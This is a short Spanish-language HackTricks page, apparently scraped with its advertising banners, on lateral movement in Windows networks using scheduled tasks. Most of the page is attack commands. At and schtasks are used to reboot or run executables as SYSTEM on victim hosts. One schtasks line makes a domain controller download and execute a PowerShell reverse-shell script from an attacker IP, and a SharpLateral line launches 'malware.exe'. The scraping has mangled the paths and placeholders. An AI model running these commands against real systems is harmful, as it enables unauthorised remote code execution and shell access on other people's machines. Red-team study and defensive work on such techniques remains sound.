Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert) ! Otras formas de apoyar a HackTricks:
Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN !
At permite programar tareas en hosts donde conoces el nombre de usuario/(contraseña/Hash). Por lo tanto, puedes usarlo para ejecutar comandos en otros hosts y obtener la salida.
Copiar At \\victim 11:00:00PM shutdown -r
Copiar schtasks /create /n < TASK_NAM E > /tr C: \p ath \e xecutable.exe /sc once /st 00 :00 /S < VICTI M > /RU System
schtasks /run /tn < TASK_NAM E > /S < VICTI M >
Copiar schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
Copiar SharpLateral schedule HOSTNAME C: \U sers \A dministrator \D esktop \m alware.exe TaskName
Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert) ! Otras formas de apoyar a HackTricks:
Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN !